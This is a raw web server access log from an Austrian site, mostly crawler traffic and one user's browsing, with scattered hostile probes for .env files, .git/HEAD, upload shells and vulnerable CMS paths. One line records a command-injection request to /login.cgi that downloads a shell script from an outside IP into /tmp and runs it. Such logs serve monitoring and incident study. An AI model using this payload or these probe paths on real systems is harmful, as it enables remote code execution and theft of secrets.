204.10.194.61 - - [16/Jan/2025:08:13:41 +0100] "GET /templates/beez_20/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:45 +0100] "GET /templates/beez_20/error.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:49 +0100] "GET /templates/protostar/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:55 +0100] "GET /templates/protostar/error.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:57 +0100] "GET /templates/atomic/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:14:00 +0100] "GET /templates/atomic/error.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:14:05 +0100] "GET /modules/mod_simplefileuploadv1.3/elements/Clean.php HTTP/1.1" 404 323 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
156.59.198.136 - - [16/Jan/2025:08:14:34 +0100] "GET /docs/contadino/2017/RE17-000032.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
159.89.167.16 - - [16/Jan/2025:08:17:14 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.88.1"
159.89.167.16 - - [16/Jan/2025:08:17:14 +0100] "GET /vendor/laravel-filemanager/js/script.js HTTP/1.1" 404 395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
159.89.167.16 - - [16/Jan/2025:08:17:17 +0100] "GET /public/vendor/laravel-filemanager/js/script.js HTTP/1.1" 404 402 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
156.59.198.135 - - [16/Jan/2025:08:18:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110210903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
84.239.41.19 - - [16/Jan/2025:08:50:53 +0100] "GET /.env HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
84.239.41.19 - - [16/Jan/2025:08:51:18 +0100] "GET /.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
156.59.198.136 - - [16/Jan/2025:08:54:52 +0100] "GET /docs/ecommlogistics/belege/RE2015.PDF HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:08:58:52 +0100] "GET /docs/contadino/2017/RE17-000012.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:09:02:53 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104021403_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:09:06:53 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00006.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:09:10:53 +0100] "GET /docs/contadino/2017/RE17-000028.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:09:14:53 +0100] "GET /docs/contadino/2017/RE17-000021.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
159.223.205.208 - - [16/Jan/2025:09:35:39 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Safari/537.36"
37.139.5.66 - - [16/Jan/2025:09:36:55 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
159.223.205.208 - - [16/Jan/2025:09:39:36 +0100] "GET /.env HTTP/1.1" 404 280 "-" "FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)"
156.59.198.135 - - [16/Jan/2025:09:46:47 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103131203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:09:50:47 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909191303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.226 - - [16/Jan/2025:09:52:02 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.172.78.230 - - [16/Jan/2025:09:52:07 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.88.1"
167.172.78.230 - - [16/Jan/2025:09:52:08 +0100] "GET /vendor/laravel-filemanager/js/script.js HTTP/1.1" 404 395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
167.172.78.230 - - [16/Jan/2025:09:52:09 +0100] "GET /public/vendor/laravel-filemanager/js/script.js HTTP/1.1" 404 402 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
165.227.45.14 - - [16/Jan/2025:09:54:14 +0100] "\x16\x03\x01" 400 383 "-" "-"
165.227.45.14 - - [16/Jan/2025:09:54:14 +0100] "\x16\x03\x01" 400 383 "-" "-"
165.227.45.14 - - [16/Jan/2025:09:54:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.45.14 - - [16/Jan/2025:09:54:14 +0100] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2"
165.227.45.14 - - [16/Jan/2025:09:54:14 +0100] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0"
165.227.45.14 - - [16/Jan/2025:09:54:15 +0100] "GET /t4 HTTP/1.1" 404 278 "-" "Mozilla/5.0"
165.227.45.14 - - [16/Jan/2025:09:54:15 +0100] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.45.14 - - [16/Jan/2025:09:54:15 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.45.14 - - [16/Jan/2025:09:54:15 +0100] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.45.14 - - [16/Jan/2025:09:54:15 +0100] "GET /systembc/password.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.45.14 - - [16/Jan/2025:09:54:16 +0100] "GET /password.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
156.59.198.135 - - [16/Jan/2025:09:54:47 +0100] "GET /docs/contadino/2017/RE17-000024.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.38.23.16 - - [16/Jan/2025:09:58:03 +0100] "GET /wp-content/themes/SqueezeTheme/style.css HTTP/1.1" 404 405 "-" "ALittle Client"
194.38.23.16 - - [16/Jan/2025:09:58:14 +0100] "GET /wp-content/themes/SqueezeTheme/style.css HTTP/1.1" 404 392 "-" "ALittle Client"
156.59.198.136 - - [16/Jan/2025:10:13:59 +0100] "GET /docs/contadino/2017/RE17-000026.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:10:26:00 +0100] "GET /renault.2web.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:10:30:00 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002241503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.49 - - [16/Jan/2025:10:31:39 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:39 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:39 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:39 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:39 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:39 +0100] "GET /gui/javascript/form_form.js?1737019899 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:39 +0100] "GET /gui/javascript/form_form.js?1737019899 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:39 +0100] "GET /gui/javascript/form_form.js?1737019899 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:39 +0100] "GET /gui/javascript/form_form.js?1737019899 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:40 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:40 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2410 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:40 +0100] "GET /gui/javascript/form_form.js?1737019900 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:40 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:40 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:31:44 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1968 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:32:48 +0100] "GET /gui/javascript/form_form.js?1737019968 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:32:48 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2012 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:32:48 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:32:48 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:32:48 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:32:48 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
195.178.110.224 - - [16/Jan/2025:10:33:43 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
178.165.176.49 - - [16/Jan/2025:10:33:48 +0100] "GET /entry.php?id=10271&&ser=19968 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:33:49 +0100] "GET /gui/javascript/form_form.js?1737020029 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=19968" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
156.59.198.136 - - [16/Jan/2025:10:34:01 +0100] "GET /renault.2web.at/stats/lang/awstats-gr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.49 - - [16/Jan/2025:10:34:49 +0100] "GET /entry.php?id=10271&&ser=20029 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=19968" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:34:49 +0100] "GET /gui/javascript/form_form.js?1737020089 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20029" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:35:50 +0100] "GET /entry.php?id=10271&&ser=20089 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=20029" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:35:50 +0100] "GET /gui/javascript/form_form.js?1737020150 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20089" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:36:51 +0100] "GET /entry.php?id=10271&&ser=20150 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=20089" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:36:51 +0100] "GET /gui/javascript/form_form.js?1737020211 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20150" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:37:51 +0100] "GET /entry.php?id=10271&&ser=20211 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=20150" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:37:51 +0100] "GET /gui/javascript/form_form.js?1737020271 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20211" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.215.236.132 - - [16/Jan/2025:10:38:47 +0100] "GET /.git/HEAD HTTP/1.1" 404 284 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01"
178.165.176.49 - - [16/Jan/2025:10:38:51 +0100] "GET /entry.php?id=10271&&ser=20271 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=20211" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:38:51 +0100] "GET /gui/javascript/form_form.js?1737020331 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20271" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:39:52 +0100] "GET /entry.php?id=10271&&ser=20331 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=20271" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:39:52 +0100] "GET /gui/javascript/form_form.js?1737020392 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20331" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:40:52 +0100] "GET /entry.php?id=10271&&ser=20392 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=20331" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:40:52 +0100] "GET /gui/javascript/form_form.js?1737020452 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20392" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:41:52 +0100] "GET /entry.php?id=10271&&ser=20452 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=20392" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:41:52 +0100] "GET /gui/javascript/form_form.js?1737020512 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20452" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:42:53 +0100] "GET /entry.php?id=10271&&ser=20512 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=20452" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:42:53 +0100] "GET /gui/javascript/form_form.js?1737020573 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20512" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:43:53 +0100] "GET /entry.php?id=10271&&ser=20573 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=20512" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:43:53 +0100] "GET /gui/javascript/form_form.js?1737020633 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20573" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:44:53 +0100] "GET /entry.php?id=10271&&ser=20633 HTTP/1.1" 200 985 "http://hausegger.activities.at/entry.php?id=10271&&ser=20573" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:44:53 +0100] "GET /gui/javascript/form_form.js?1737020693 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20633" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:45:53 +0100] "GET /entry.php?id=10271&&ser=20693 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=20633" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:45:54 +0100] "GET /gui/javascript/form_form.js?1737020754 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20693" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:46:54 +0100] "GET /entry.php?id=10271&&ser=20754 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=20693" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:46:54 +0100] "GET /gui/javascript/form_form.js?1737020814 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20754" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:47:54 +0100] "GET /entry.php?id=10271&&ser=20814 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=20754" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:47:54 +0100] "GET /gui/javascript/form_form.js?1737020874 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20814" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:48:55 +0100] "GET /entry.php?id=10271&&ser=20874 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=20814" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:48:55 +0100] "GET /gui/javascript/form_form.js?1737020935 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20874" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:49:53 +0100] "GET /entry.php?id=10828 HTTP/1.1" 200 9140 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:49:54 +0100] "GET /gui/javascript/form_form.js?1737020993 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:49:54 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:49:54 +0100] "GET /gui/javascript/form_form.js?1737020994 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:49:55 +0100] "GET /entry.php?id=10271&&ser=20935 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=20874" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [16/Jan/2025:10:49:55 +0100] "GET /gui/javascript/form_form.js?1737020995 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=20935" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
